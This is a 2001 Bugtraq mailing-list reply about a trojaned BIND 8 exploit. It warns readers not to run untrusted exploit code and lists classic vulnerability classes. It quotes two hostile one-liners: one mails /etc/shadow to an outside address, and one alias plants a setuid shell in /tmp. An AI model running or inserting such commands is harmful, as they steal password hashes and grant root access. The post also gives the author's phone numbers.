[18942] in bugtraq
Re: Bind 8 Exploit - Trojan
daemon@ATHENA.MIT.EDU (Jonathan Katz)
Fri Feb 2 02:56:54 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20010201150335.R27696@jonworld.com>
Date: Thu, 1 Feb 2001 15:03:35 -0500
Reply-To: Jonathan Katz <jon@JONWORLD.COM>
From: Jonathan Katz <jon@JONWORLD.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.31.0102010907000.757-100000@rush>; from
beldridg@BEST.COM on Thu, Feb 01, 2001 at 09:09:02AM -0800
Yesterday, Matt Lewis wrote:
> How did this get approved, did anyone test it or review it?
and Today, Brett Eldridge pointed out:
> i don't think that the moderator's job is to test all the exploits that
> get mailed to the list.
[...]
> that said, anybody who blindly uses exploit code deserves what they get.
> next time, test the code in a controlled environment.
This is just history repeating itself. Remember that 'sshd exploit
code' someone posted here about 2-3 years back? For some reason you
*had* to run it as root. Burried in its shellcode was a very simple
'mailx JPandKit@hotmail.com < /etc/shadow'. This is just old news and
new kiddies thinking they're being special by playing with old tricks.
If you run code without looking at it or thinking it through, "Boo Hoo!"
Show me something new and exciting.
Security hasn't changed much:
[1] Backdoors/easter-eggs (Sendmail 3.x 'WIZ'->Borland Inprise)
[2] buffer overflows (fingerd->statd->imapd)
[3] race conditions and a lack of randomness (think /tmp, TCP sequencing)
[4] permissions (Remember when SunOS and Solaris installed with a mode 666
/var/adm/messages? Various distros of Linux did the same 3 years later
with its syslogs.)
[5] trojans (alias mroe='cp /bin/sh /tmp/sh; chmod 04755 /tmp/sh')
-Jon
--
Jonathan Katz [] jon@jonworld.com [] http://jonworld.com
"Live fast, die young, leave a really messy corpse."
Cell: 317-698-4023 [] Pager: 800-759-8888 1770869 aka 1770869@skytel.com
